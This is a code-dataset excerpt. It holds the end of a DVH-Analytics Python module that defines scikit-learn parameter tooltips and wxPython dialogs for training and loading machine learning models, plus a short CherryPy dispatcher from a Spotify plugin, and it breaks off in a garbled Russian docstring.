int(max_features * n_features) features are considered \"\n \"at each split.\\n• If “auto”, then max_features=n_features.\\n• If \"\n \"“sqrt”, then max_features=sqrt(n_features).\\n• If “log2”, then max\"\n \"_features=log2(n_features).\\n• If None, then max_features=n_features.\"\n \"\\nChoosing max_features < n_features leads to a reduction of variance\"\n \" and an increase in bias.\",\n \"alpha\": \"float\\nThe alpha-quantile of the huber loss function and the quantile loss \"\n \"function. Only if loss='huber' or loss='quantile'.\",\n \"max_leaf_nodes\": \"int or None\\nGrow a tree with max_leaf_nodes in best-first fashion. \"\n \"Best nodes are defined as relative reduction in impurity. If None \"\n \"then unlimited number of leaf nodes.\",\n \"min_impurity_decrease\": \"float\\nA node will be split if this split induces a decrease \"\n \"of the impurity greater than or equal to this value.\\nThe \"\n \"weighted impurity decrease equation is the following:\\n\"\n \"N_t / N * (impurity - N_t_R / N_t * right_impurity\\n\"\n \" - N_t_L / N_t * left_impurity)\\nwhere N is\"\n \" the total number of samples, N_t is the number of samples at\"\n \" the current node, N_t_L is the number of samples in the left\"\n \" child, and N_t_R is the number of samples in the right child.\"\n \"\\nN, N_t, N_t_R and N_t_L all refer to the weighted sum, if \"\n \"sample_weight is passed.\",\n \"init\": \"If ‘zero’, the initial raw predictions are set to zero. By default a \"\n \"DummyEstimator is used, predicting either the average target value \"\n \"(for loss=’ls’), or a quantile for the other losses.\",\n \"random_state\": \"int or None\\nIf int, random_state is the seed used by the random number\"\n \" generator; If None, the random number generator is the RandomState \"\n \"instance used by np.random.\",\n \"presort\": \"Whether to presort the data to speed up the finding of best splits in \"\n \"fitting. 
Auto mode by default will use presorting on dense data and default \"\n \"to normal sorting on sparse data. Setting presort to true on sparse data \"\n \"will raise an error.\",\n \"validation_fraction\": \"float\\nThe proportion of training data to set aside as \"\n \"validation set for early stopping. Must be between 0 and 1. \"\n \"Only used if n_iter_no_change is set to an integer.\",\n \"n_iter_no_change\": \"int or None\\nn_iter_no_change is used to decide if early stopping \"\n \"will be used to terminate training when validation score is not \"\n \"improving. By default it is set to None to disable early stopping.\"\n \" If set to a number, it will set aside validation_fraction size of\"\n \" the training data as validation and terminate training when \"\n \"validation score is not improving in all of the previous \"\n \"n_iter_no_change numbers of iterations.\",\n \"tol\": \"float\\nTolerance for the early stopping. When the loss is not improving by at \"\n \"least tol for n_iter_no_change iterations (if set to a number), the training \"\n \"stops.\",\n}\n\nDT_TOOL_TIPS = {\n \"criterion\": \"The function to measure the quality of a split. Supported criteria are \"\n \"“mse” for the mean squared error, which is equal to variance reduction \"\n \"as feature selection criterion and minimizes the L2 loss using the mean \"\n \"of each terminal node, “friedman_mse”, which uses mean squared error \"\n \"with Friedman’s improvement score for potential splits, and “mae” for \"\n \"the mean absolute error, which minimizes the L1 loss using the median of\"\n \" each terminal node.\",\n \"splitter\": \"The strategy used to choose the split at each node. Supported strategies \"\n \"are “best” to choose the best split and “random” to choose the best \"\n \"random split.\",\n \"max_depth\": \"int, None\\nThe maximum depth of the tree. If None, then nodes are expanded\"\n \" until all leaves are pure or until all leaves contain less than \"\n \"min_samples_split samples.\",\n \"min_samples_split\": \"int, float\\nThe minimum number of samples required to split an \"\n \"internal node:\\n• If int, then consider min_samples_split as the \"\n \"minimum number.\\n• If float, then min_samples_split is a fraction\"\n \" and ceil(min_samples_split * n_samples) are the minimum number \"\n \"of samples for each split.\",\n \"min_samples_leaf\": \"int, float\\nThe minimum number of samples required to be at a leaf\"\n \" node. A split point at any depth will only be considered if it \"\n \"leaves at least min_samples_leaf training samples in each of the \"\n \"left and right branches. This may have the effect of smoothing the\"\n \" model, especially in regression.\\n• If int, then consider \"\n \"min_samples_leaf as the minimum number.\\n• If float, then \"\n \"min_samples_leaf is a fraction and ceil(min_samples_leaf * \"\n \"n_samples) are the minimum number of samples for each node.\",\n \"min_weight_fraction_leaf\": \"float\\nThe minimum weighted fraction of the sum total of \"\n \"weights (of all the input samples) required to be at a leaf\"\n \" node. 
Samples have equal weight when sample_weight is not\"\n \" provided.\",\n \"max_features\": \"int, float, string, or None\\nThe number of features to consider when\"\n \" looking for the best split:\\n• If int, then consider max_features \"\n \"features at each split.\\n• If float, then max_features is a fraction\"\n \" and int(max_features * n_features) features are considered at each \"\n \"split.\\n• If “auto”, then max_features=n_features.\\n• If “sqrt”, \"\n \"then max_features=sqrt(n_features).\\n• If “log2”, \"\n \"then max_features=log2(n_features).\\n• If None, then \"\n \"max_features=n_features.\",\n \"max_leaf_nodes\": \"int or None\\nGrow a tree with max_leaf_nodes in best-first fashion. \"\n \"Best nodes are defined as relative reduction in impurity. If None \"\n \"then unlimited number of leaf nodes.\",\n \"min_impurity_decrease\": \"float\\nA node will be split if this split induces a decrease \"\n \"of the impurity greater than or equal to this value.\\nThe \"\n \"weighted impurity decrease equation is the following:\\n\"\n \"N_t / N * (impurity - N_t_R / N_t * right_impurity\\n\"\n \" - N_t_L / N_t * left_impurity)\\nwhere N is\"\n \" the total number of samples, N_t is the number of samples at\"\n \" the current node, N_t_L is the number of samples in the left\"\n \" child, and N_t_R is the number of samples in the right child.\"\n \"\\nN, N_t, N_t_R and N_t_L all refer to the weighted sum, if \"\n \"sample_weight is passed.\",\n \"random_state\": \"int or None\\nIf int, random_state is the seed used by the random number\"\n \" generator; If None, the random number generator is the RandomState \"\n \"instance used by np.random.\",\n \"presort\": \"Whether to presort the data to speed up the finding of best splits in \"\n \"fitting. For the default settings of a decision tree on large datasets, \"\n \"setting this to true may slow down the training process. When using either \"\n \"a smaller dataset or a restricted depth, this may speed up the training.\",\n}\n\nSVR_TOOL_TIPS = {\n \"kernel\": \"string\\n\"\n \"Specifies the kernel type to be used in the algorithm. It must be one of ‘linear’, ‘poly’, \"\n \"‘rbf’, ‘sigmoid’, ‘precomputed’ or a callable. If none is given, ‘rbf’ will be used. If \"\n \"a callable is given it is used to precompute the kernel matrix.\",\n \"degree\": \"int\\n\"\n \"Degree of the polynomial kernel function (‘poly’). Ignored by all other kernels.\",\n \"gamma\": \"float\\n\"\n \"Kernel coefficient for ‘rbf’, ‘poly’ and ‘sigmoid’.\\n\\n\"\n \"Current default is ‘auto’ which uses 1 / n_features, if gamma='scale' is passed then it \"\n \"uses 1 / (n_features * X.var()) as value of gamma. The current default of gamma, ‘auto’, \"\n \"will change to ‘scale’ in version 0.22. ‘auto_deprecated’, a deprecated version of ‘auto’ \"\n \"is used as a default indicating that no explicit value of gamma was passed.\",\n \"coef0\": \"float\\n\"\n \"Independent term in kernel function. It is only significant in ‘poly’ and ‘sigmoid’\",\n \"tol\": \"float\\n\" \"Tolerance for stopping criterion.\",\n \"C\": \"float\\n\" \"Penalty parameter C of the error term.\",\n \"epsilon\": \"float\\n\"\n \"Epsilon in the epsilon-SVR model. 
It specifies the epsilon-tube within which no penalty is\"\n \" associated in the training loss function with points predicted within a distance epsilon\"\n \" from the actual value.\",\n \"shrinking\": \"boolean\\n\" \"Whether to use the shrinking heuristic\",\n \"cache_size\": \"float\\n\" \"Specify the size of the kernel cache (in MB)\",\n \"max_iter\": \"int\\n\"\n \"Hard limit on iterations within solver, or -1 for no limit.\",\n}\n\nDATA_SPLIT_TOOL_TIPS = {\n \"test_size\": \"float, int, or None\\n\"\n \"If float, should be between 0.0 and 1.0 and represent the proportion of the \"\n \"dataset to include in the test split. If int, represents the absolute number of \"\n \"test samples. If None, the value is set to the complement of the train size. If \"\n \"train_size is also None, it will be set to 0.25.\",\n \"train_size\": \"float, int, or None\\n\"\n \"If float, should be between 0.0 and 1.0 and represent the proportion of the \"\n \"dataset to include in the train split. If int, represents the absolute number \"\n \"of train samples. If None, the value is automatically set to the complement of \"\n \"the test size.\",\n \"random_state\": \"int or None\\n\"\n \"If int, random_state is the seed used by the random number generator; If None,\"\n \" the random number generator is the RandomState instance used by np.random.\",\n \"shuffle\": \"boolean\\n\"\n \"Whether or not to shuffle the data before splitting. If shuffle=False then stratify\"\n \" must be None.\",\n}\n\n\nMLP_TOOL_TIPS = {\n \"hidden_layer_sizes\": \"tuple, length = n_layers - 2\\n\",\n \"activation\": \"string\\n\"\n \"Activation function for the hidden layer.\\n\"\n \"identity: no-op activation, useful to implement linear bottleneck, returns f(x) = x.\\n\"\n \"logistic: the logistic sigmoid function, returns f(x) = 1 / (1 + exp(-x)).\\n\"\n \"tanh: the hyperbolic tan function, returns f(x) = tanh(x).\\n\"\n \"relu: the rectified linear unit function, returns f(x) = max(0, x)\",\n \"solver\": \"string\\nThe solver for weight optimization.\"\n \"lbfgs is an optimizer in the family of quasi-Newton methods.\\n\"\n \"sgd refers to stochastic gradient descent.\\n\"\n \"adam refers to a stochastic gradient-based optimizer proposed by Kingma, Diederik, \"\n \"and Jimmy Ba\\n\\n\"\n \"Note: The default solver ‘adam’ works pretty well on relatively large datasets \"\n \"(with thousands of training samples or more) in terms of both training time and validation \"\n \"score. For small datasets, however, ‘lbfgs’ can converge faster and perform better.\",\n \"alpha\": \"float\\n\" \"L2 penalty (regularization term) parameter.\",\n \"batch_size\": \"int or string\\n\"\n \"Size of minibatches for stochastic optimizers. If the solver is ‘lbfgs’, the \"\n \"classifier will not use minibatch. When set to “auto”, batch_size=min(200, n_samples)\",\n \"learning_rate\": \"string\\n\"\n \"Learning rate schedule for weight updates.\\n\"\n \"constant is a constant learning rate given by ‘learning_rate_init’.\\n\"\n \"invscaling gradually decreases the learning rate at each time step ‘t’ \"\n \"using an inverse scaling exponent of ‘power_t’. effective_\"\n \"learning_rate = learning_rate_init / pow(t, power_t)\\n\"\n \"adaptive keeps the learning rate constant to ‘learning_rate_init’ as long as \"\n \"training loss keeps decreasing. 
Each time two consecutive epochs fail to decrease \"\n \"training loss by at least tol, or fail to increase validation score by at least \"\n \"tol if ‘early_stopping’ is on, the current learning rate is divided by 5.\",\n \"learning_rate_init\": \"double\\n\"\n \"The initial learning rate used. It controls the step-size in updating the \"\n \"weights. Only used when solver=’sgd’ or ‘adam’.\",\n \"power_t\": \"double\\n\"\n \"The exponent for inverse scaling learning rate. It is used in updating effective \"\n \"learning rate when the learning_rate is set to ‘invscaling’. Only used when solver=’sgd’.\",\n \"max_iter\": \"int\\n\"\n \"Maximum number of iterations. The solver iterates until convergence (determined by \"\n \"‘tol’) or this number of iterations. For stochastic solvers (‘sgd’, ‘adam’), note that \"\n \"this determines the number of epochs (how many times each data point will be used), not \"\n \"the number of gradient steps.\",\n \"shuffle\": \"bool\\n\"\n \"Whether to shuffle samples in each iteration. Only used when solver=’sgd’ or ‘adam’.\",\n \"random_state\": \"int or None\\n\"\n \"If int, random_state is the seed used by the random number generator; \"\n \"If None, the random number generator is the RandomState instance used by np.random.\",\n \"tol\": \"float\\n\"\n \"Tolerance for the optimization. When the loss or score is not improving by at least tol for \"\n \"n_iter_no_change consecutive iterations, unless learning_rate is set to ‘adaptive’, \"\n \"convergence is considered to be reached and training stops.\",\n \"warm_start\": \"bool\\n\"\n \"When set to True, reuse the solution of the previous call to fit as initialization, \"\n \"otherwise, just erase the previous solution.\",\n \"momentum\": \"float\\n\"\n \"Momentum for gradient descent update. Should be between 0 and 1. \"\n \"Only used when solver=’sgd’.\",\n \"nesterovs_momentum\": \"bool\\n\"\n \"Whether to use Nesterov’s momentum. Only used when solver=’sgd’ \"\n \"and momentum > 0.\",\n \"early_stopping\": \"bool\\n\"\n \"Whether to use early stopping to terminate training when validation score is not \"\n \"improving. If set to true, it will automatically set aside 10% of training data \"\n \"as validation and terminate training when validation score is not improving by \"\n \"at least tol for n_iter_no_change consecutive epochs. The split is stratified, \"\n \"except in a multilabel setting. Only effective when solver=’sgd’ or ‘adam’\",\n \"validation_fraction\": \"float\\n\"\n \"The proportion of training data to set aside as validation set for early \"\n \"stopping. Must be between 0 and 1. Only used if early_stopping is True\",\n \"beta_1\": \"float\\n\"\n \"Exponential decay rate for estimates of first moment vector in adam, should be in [0, 1). \"\n \"Only used when solver=’adam’\",\n \"beta_2\": \"float\\n\"\n \"Exponential decay rate for estimates of second moment vector in adam, should be in [0, 1).\"\n \" Only used when solver=’adam’\",\n \"epsilon\": \"float\\n\"\n \"Value for numerical stability in adam. Only used when solver=’adam’\",\n \"n_iter_no_change\": \"int\\n\"\n \"Maximum number of epochs to not meet tol improvement. 
Only effective when \"\n \"solver=’sgd’ or ‘adam’\",\n}\n\n\nALGORITHMS = {\n \"Random Forest\": {\n \"regressor\": RandomForestRegressor,\n \"classifier\": RandomForestClassifier,\n \"tool_tips\": RF_TOOL_TIPS,\n \"frame\": RandomForestFrame,\n },\n \"Support Vector Machine\": {\n \"regressor\": SVR,\n \"classifier\": SVC,\n \"tool_tips\": SVR_TOOL_TIPS,\n \"frame\": SupportVectorRegressionFrame,\n },\n \"Gradient Boosting\": {\n \"regressor\": GradientBoostingRegressor,\n \"classifier\": GradientBoostingClassifier,\n \"tool_tips\": GB_TOOL_TIPS,\n \"frame\": GradientBoostingFrame,\n },\n \"Decision Tree\": {\n \"regressor\": DecisionTreeRegressor,\n \"classifier\": DecisionTreeClassifier,\n \"tool_tips\": DT_TOOL_TIPS,\n \"frame\": DecisionTreeFrame,\n },\n \"Multilayer Perceptron\": {\n \"regressor\": MLPRegressor,\n \"classifier\": MLPClassifier,\n \"tool_tips\": MLP_TOOL_TIPS,\n \"frame\": MLPFrame,\n },\n}\n\n\nclass MachineLearningPlotData:\n def __init__(self, X, y, model, do_training=True, **kwargs):\n self.model = model\n self.split_args = kwargs\n\n indices = list(range(len(y)))\n\n # split the data for training and testing\n split_data = train_test_split(X, indices, **kwargs)\n self.X = {\"data\": X, \"train\": split_data[0], \"test\": split_data[1]}\n self.indices = {\n \"data\": indices,\n \"train\": split_data[2],\n \"test\": split_data[3],\n }\n self.y = {\n \"data\": y,\n \"train\": [y[i] for i in split_data[2]],\n \"test\": [y[i] for i in split_data[3]],\n }\n self.x = {\n key: [i + 1 for i in range(len(data))]\n for key, data in self.y.items()\n }\n\n # Train model, then calculate predictions, residuals, and mse\n if do_training:\n self.model.fit(self.X[\"train\"], self.y[\"train\"])\n self.predictions = {\n key: self.get_prediction(key) for key in self.y.keys()\n }\n self.residuals = {key: self.get_residual(key) for key in self.y.keys()}\n self.mse = {key: self.get_mse(key) for key in self.y.keys()}\n self.accuracy = {key: self.get_accuracy(key) for key in self.y.keys()}\n\n def get_prediction(self, key):\n return self.model.predict(self.X[key])\n\n def get_mse(self, key):\n return np.mean(\n np.square(np.subtract(self.predictions[key], self.y[key]))\n )\n\n def get_residual(self, key):\n return np.subtract(self.y[key], self.model.predict(self.X[key]))\n\n def get_accuracy(self, key):\n \"\"\"Only applicable for classifiers\"\"\"\n return np.count_nonzero(\n np.subtract(self.predictions[key], self.y[key]) == 0\n ) / len(self.y[key])\n\n @property\n def feature_importances(self):\n if hasattr(self.model, \"feature_importances_\"):\n return self.model.feature_importances_\n return None\n\n\nclass FeatureImportanceFrame(wx.Frame):\n def __init__(\n self,\n options,\n x_variables,\n feature_importances,\n frame_title,\n plot_title,\n ):\n wx.Frame.__init__(self, None)\n\n self.title = frame_title\n\n self.plot = PlotFeatureImportance(\n self, options, x_variables, feature_importances, plot_title\n )\n\n self.set_properties()\n self.do_layout()\n\n self.Bind(wx.EVT_SIZE, self.on_resize)\n\n def set_properties(self):\n self.SetTitle(self.title)\n self.SetMinSize(get_window_size(0.35, 0.8))\n\n def do_layout(self):\n sizer_wrapper = wx.BoxSizer(wx.HORIZONTAL)\n sizer_wrapper.Add(self.plot.layout, 1, wx.EXPAND, 0)\n\n set_msw_background_color(\n self\n ) # If windows, change the background color\n set_frame_icon(self)\n\n self.SetSizer(sizer_wrapper)\n self.Layout()\n self.Fit()\n self.Center()\n\n def redraw_plot(self):\n self.plot.redraw_plot()\n\n def on_resize(self, 
*evt):\n try:\n self.Refresh()\n self.Layout()\n wx.CallAfter(self.redraw_plot)\n except RuntimeError:\n pass\n\n\nclass MachineLearningModelViewer:\n def __init__(self, parent, group_data, group, options, mvr=None):\n self.parent = parent\n self.group_data = group_data\n self.group = group\n self.stats_data = group_data[group][\"stats_data\"]\n self.options = options\n\n self.file_path = self.file_select_dlg()\n\n if self.file_path:\n\n self.__load_ml_file()\n try:\n if self.is_valid:\n self.__set_X_and_y_data()\n\n self.mvr = mvr\n self.multi_var_pred = (\n None if mvr is None else self.mvr.predictions\n )\n\n data_keys = [\n \"X\",\n \"y\",\n \"x_variables\",\n \"y_variable\",\n \"multi_var_pred\",\n \"options\",\n \"mrn\",\n \"study_date\",\n \"uid\",\n ]\n data = {key: getattr(self, key) for key in data_keys}\n frame = ALGORITHMS[self.title][\"frame\"]\n self.ml_frame = frame(\n parent, data, include_test_data=False\n )\n self.__load_model()\n\n set_msw_background_color(self.ml_frame)\n set_frame_icon(self.ml_frame)\n\n self.ml_frame.run()\n else:\n if self.stats_data is None:\n msg = \"No data has been queried for Group %s.\" % group\n elif not self.is_ml:\n msg = \"Selected file is not a valid machine learning model save file.\"\n elif not self.stats_data_has_y:\n msg = (\n \"The model's dependent variable is not found in your queried data:\\n%s\"\n % self.y_variable\n )\n elif self.missing_x_variables:\n msg = (\n \"Your queried data is missing the following independent variables:\\n%s\"\n % \", \".join(self.missing_x_variables)\n )\n else:\n msg = \"Unknown error.\"\n\n wx.MessageBox(\n msg,\n \"Model Loading Error\",\n wx.OK | wx.OK_DEFAULT | wx.ICON_WARNING,\n )\n except Exception as e:\n msg = str(e)\n wx.MessageBox(\n msg,\n \"Model Loading Error\",\n wx.OK | wx.OK_DEFAULT | wx.ICON_WARNING,\n )\n\n def file_select_dlg(self):\n with wx.FileDialog(\n self.parent,\n \"Load a machine learning model\",\n wildcard=\"*.ml\",\n style=wx.FD_FILE_MUST_EXIST | wx.FD_OPEN,\n ) as dlg:\n dlg.SetDirectory(MODELS_DIR)\n if dlg.ShowModal() == wx.ID_OK:\n return dlg.GetPath()\n\n def __load_ml_file(self):\n self.loaded_data = load_object_from_file(self.file_path)\n\n self.y_variable = self.loaded_data[\"y_variable\"]\n self.tool_tips = self.loaded_data[\"tool_tips\"]\n self.x_variables = self.loaded_data[\"x_variables\"]\n self.title = self.loaded_data[\"title\"]\n self.input_parameters = self.loaded_data[\"input_parameters\"]\n self.data_split = self.loaded_data[\"data_split\"]\n self.version = self.loaded_data[\"version\"]\n\n # As of v0.8.9, model -> sklearn_predictor, regression -> model\n if \"sklearn_predictor\" in self.loaded_data.keys():\n self.model = self.loaded_data[\"model\"]\n self.sklearn_predictor = self.loaded_data[\"sklearn_predictor\"]\n else:\n self.model = self.loaded_data[\"regression\"]\n self.sklearn_predictor = self.loaded_data[\"model\"]\n\n def __load_model(self):\n self.ml_frame.model = self.model\n self.ml_frame.set_input_parameters(self.input_parameters)\n self.ml_frame.set_data_split_parameters(self.data_split)\n self.__disable_input()\n\n def __disable_input(self):\n for variable, input_obj in self.ml_frame.input.items():\n input_obj.Disable()\n for variable, input_obj in self.ml_frame.data_split_input.items():\n input_obj.Disable()\n self.ml_frame.button_calculate.Disable()\n self.ml_frame.button_save_model.Disable()\n\n def __set_X_and_y_data(self):\n (\n self.X,\n self.y,\n self.mrn,\n self.uid,\n self.study_date,\n ) = self.stats_data.get_X_and_y(\n 
self.y_variable, self.x_variables, include_patient_info=True\n )\n\n @property\n def is_ml(self):\n return \"title\" in list(self.loaded_data) and self.loaded_data[\n \"title\"\n ] in list(ALGORITHMS)\n\n @property\n def is_valid(self):\n return (\n self.stats_data is not None\n and self.is_ml\n and not self.missing_x_variables\n and self.stats_data_has_y\n )\n\n @property\n def missing_x_variables(self):\n return [\n x for x in self.x_variables if x not in list(self.stats_data.data)\n ]\n\n @property\n def stats_data_has_y(self):\n return self.y_variable in list(self.stats_data.data)\n\n def apply_plot_options(self):\n self.ml_frame.plot.apply_options()\n self.ml_frame.redraw_plot()\n\n\nclass MachineLearningSetupDlg(wx.Dialog):\n def __init__(self, stats_data, options):\n wx.Dialog.__init__(self, None, title=\"Machine Learning\")\n\n self.stats_data = stats_data\n self.options = options\n\n self.combo_box_type = wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"Regression\", \"Classification\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n )\n self.combo_box_alg = wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=sorted(list(ALGORITHMS.keys())),\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n )\n self.combo_box_nan = wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"Ignore Study\", \"Ignore Feature\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n )\n self.combo_box_y = wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=stats_data.variables,\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n )\n\n self.list_ctrl_features = wx.ListCtrl(\n self, wx.ID_ANY, style=wx.LC_NO_HEADER | wx.LC_REPORT\n )\n\n bmp = wx.ArtProvider.GetBitmap(wx.ART_INFORMATION, size=(16, 16))\n self.button_info = wx.BitmapButton(self, id=wx.ID_ANY, bitmap=bmp)\n\n self.button_select_all = wx.Button(self, wx.ID_ANY, \"Select All\")\n self.button_deselect_all = wx.Button(self, wx.ID_ANY, \"Deselect All\")\n self.button_ok = wx.Button(self, wx.ID_OK, \"OK\")\n\n self.button_cancel = wx.Button(self, wx.ID_CANCEL, \"Cancel\")\n\n self.__set_properties()\n\n self.__do_bind()\n self.__do_layout()\n\n def __set_properties(self):\n self.list_ctrl_features.AppendColumn(\n \"Features\", format=wx.LIST_FORMAT_LEFT, width=400\n )\n\n for choice in self.stats_data.variables:\n self.list_ctrl_features.InsertItem(50000, choice)\n\n self.combo_box_type.SetValue(\"Regression\")\n self.combo_box_alg.SetValue(sorted(list(ALGORITHMS.keys()))[0])\n self.combo_box_nan.SetValue(\"Ignore Study\")\n self.combo_box_y.SetValue(self.stats_data.variables[0])\n\n def __do_bind(self):\n self.Bind(\n wx.EVT_BUTTON, self.select_all, id=self.button_select_all.GetId()\n )\n self.Bind(\n wx.EVT_BUTTON,\n self.deselect_all,\n id=self.button_deselect_all.GetId(),\n )\n self.Bind(wx.EVT_BUTTON, self.on_info, id=self.button_info.GetId())\n\n def __do_layout(self):\n\n sizer_wrapper = wx.BoxSizer(wx.VERTICAL)\n sizer_main = wx.BoxSizer(wx.VERTICAL)\n sizer_input_wrapper = wx.StaticBoxSizer(\n wx.StaticBox(self, wx.ID_ANY, \"\"), wx.HORIZONTAL\n )\n sizer_input = wx.BoxSizer(wx.VERTICAL)\n sizer_type = wx.BoxSizer(wx.VERTICAL)\n sizer_type_sub_sizer = wx.BoxSizer(wx.HORIZONTAL)\n sizer_alg = wx.BoxSizer(wx.VERTICAL)\n sizer_nan_policy = wx.BoxSizer(wx.VERTICAL)\n sizer_y_var = wx.BoxSizer(wx.VERTICAL)\n sizer_features = wx.BoxSizer(wx.VERTICAL)\n sizer_select_all = wx.BoxSizer(wx.HORIZONTAL)\n sizer_ok_cancel = wx.BoxSizer(wx.HORIZONTAL)\n\n label_type = wx.StaticText(self, wx.ID_ANY, \"ML Type:\")\n label_alg = wx.StaticText(self, wx.ID_ANY, \"Algorithm:\")\n label_nan_policy = 
wx.StaticText(self, wx.ID_ANY, \"NaN Policy:\")\n label_y = wx.StaticText(self, wx.ID_ANY, \"Dependent Variable:\")\n label_features = wx.StaticText(self, wx.ID_ANY, \"Features:\")\n\n sizer_type.Add(label_type, 0, 0, 0)\n sizer_type_sub_sizer.Add(self.combo_box_type, 1, wx.EXPAND, 0)\n sizer_type_sub_sizer.Add(self.button_info, 0, wx.EXPAND | wx.LEFT, 5)\n sizer_type.Add(sizer_type_sub_sizer, 0, wx.EXPAND, 0)\n sizer_input.Add(sizer_type, 0, wx.ALL | wx.EXPAND, 5)\n\n sizer_alg.Add(label_alg, 0, 0, 0)\n sizer_alg.Add(self.combo_box_alg, 0, wx.EXPAND, 0)\n sizer_input.Add(sizer_alg, 0, wx.ALL | wx.EXPAND, 5)\n\n sizer_nan_policy.Add(label_nan_policy, 0, 0, 0)\n sizer_nan_policy.Add(self.combo_box_nan, 0, wx.EXPAND, 0)\n sizer_input.Add(sizer_nan_policy, 0, wx.ALL | wx.EXPAND, 5)\n\n sizer_y_var.Add(label_y, 0, 0, 0)\n sizer_y_var.Add(self.combo_box_y, 0, wx.EXPAND, 0)\n sizer_input.Add(sizer_y_var, 0, wx.ALL | wx.EXPAND, 5)\n\n sizer_features.Add(label_features, 0, wx.BOTTOM | wx.EXPAND, 5)\n sizer_features.Add(self.list_ctrl_features, 1, wx.EXPAND, 0)\n sizer_select_all.Add(self.button_select_all, 0, wx.ALL, 5)\n sizer_select_all.Add(self.button_deselect_all, 0, wx.ALL, 5)\n sizer_features.Add(sizer_select_all, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)\n\n sizer_input.Add(\n sizer_features, 1, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 5\n )\n\n sizer_input_wrapper.Add(sizer_input, 1, wx.EXPAND, 0)\n sizer_main.Add(sizer_input_wrapper, 1, wx.EXPAND | wx.RIGHT, 5)\n\n sizer_ok_cancel.Add(self.button_ok, 0, wx.ALL, 5)\n sizer_ok_cancel.Add(self.button_cancel, 0, wx.ALL, 5)\n sizer_main.Add(sizer_ok_cancel, 0, wx.ALIGN_RIGHT | wx.RIGHT, 5)\n\n sizer_wrapper.Add(sizer_main, 1, wx.ALL | wx.EXPAND, 5)\n\n self.SetSizer(sizer_wrapper)\n sizer_wrapper.Fit(self)\n\n self.Layout()\n self.Center()\n\n def select_all(self, evt):\n self.apply_global_selection()\n\n def deselect_all(self, evt):\n self.apply_global_selection(on=0)\n\n def apply_global_selection(self, on=1):\n for i in range(len(self.stats_data.variables)):\n self.list_ctrl_features.Select(i, on=on)\n\n @property\n def selected_indices(self):\n if len(get_selected_listctrl_items(self.list_ctrl_features)) == 0:\n self.apply_global_selection()\n return get_selected_listctrl_items(self.list_ctrl_features)\n\n @property\n def selected_features(self):\n features = [\n self.list_ctrl_features.GetItem(i, 0).GetText()\n for i in self.selected_indices\n ]\n ignore_me = [self.y]\n if self.ignore_feature_if_nan:\n ignore_me.extend(self.stats_data.vars_with_nan_values)\n return sorted(list(set(features) - set(ignore_me)))\n\n @property\n def alg_type(self):\n return [\"classifier\", \"regressor\"][\n self.combo_box_type.GetValue() == \"Regression\"\n ]\n\n @property\n def ml_alg(self):\n return self.combo_box_alg.GetValue()\n\n @property\n def y(self):\n return self.combo_box_y.GetValue()\n\n @property\n def ignore_feature_if_nan(self):\n return self.combo_box_nan.GetValue() == \"Ignore Feature\"\n\n @property\n def ml_input_data(self):\n X, y, mrn, uid, dates = self.stats_data.get_X_and_y(\n self.y, self.selected_features, include_patient_info=True\n )\n\n return {\n \"X\": X,\n \"y\": y,\n \"x_variables\": self.selected_features,\n \"y_variable\": self.y,\n \"options\": self.options,\n \"mrn\": mrn,\n \"study_date\": dates,\n \"uid\": uid,\n }\n\n def on_info(self, *evt):\n msg = (\n \"You can add new features by going to Data -> Show Stats Data in the menu bar. \"\n \"Right-click a column header to add a new column. 
You can copy/paste data to/from MS Excel.\\n\\n\"\n \"This is how you can add categorical data for a classifier (e.g., toxicity grade), however, \"\n \"data currently MUST be numeric. You'll need to use integers to represent your categories.\"\n )\n wx.MessageBox(\n msg,\n \"Data Editing Tip\",\n wx.OK | wx.OK_DEFAULT | wx.ICON_INFORMATION,\n )\n","repo_name":"cutright/DVH-Analytics","sub_path":"dvha/models/machine_learning.py","file_name":"machine_learning.py","file_ext":"py","file_size_in_byte":70701,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"78"} +{"seq_id":"74725542333","text":"import cherrypy\nimport re\n\n\nclass Dispatcher(cherrypy.dispatch.Dispatcher):\n routes = {\n '/track': (re.compile(r\"/track/(.*?)\\.mp3\", re.IGNORECASE), 'track')\n }\n\n def __init__(self, server):\n super(Dispatcher, self).__init__()\n self.server = server\n\n def __call__(self, path_info):\n matching_routes = [name for name in self.routes.keys() if path_info.startswith(name)]\n\n if not matching_routes:\n return super(Dispatcher, self).__call__(path_info)\n\n r_regex, r_func = self.routes[matching_routes[0]]\n\n match = r_regex.match(path_info)\n\n if not match:\n return super(Dispatcher, self).__call__(path_info)\n\n func = getattr(self.server, r_func)\n\n request = cherrypy.serving.request\n\n request.config = cherrypy.config.copy()\n request.config.update(getattr(func, '_cp_config', {}))\n\n request.handler = cherrypy.dispatch.LateParamPageHandler(func, *match.groups())\n","repo_name":"fuzeman/Spotify2.bundle","sub_path":"Contents/Libraries/Shared/plugin/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"78"} +{"seq_id":"42610360559","text":"\"\"\"\nПрочитать с файломох преобразований выводить на экран).ранённый csv-файл, первой файл и с файломох преобразований выводить на экран).ранить данные\nв excel файл кроме воз example.txtрас файломта – имя(str), возраст(int). с файломтолбец и добавив новый столбец “телефон”. 
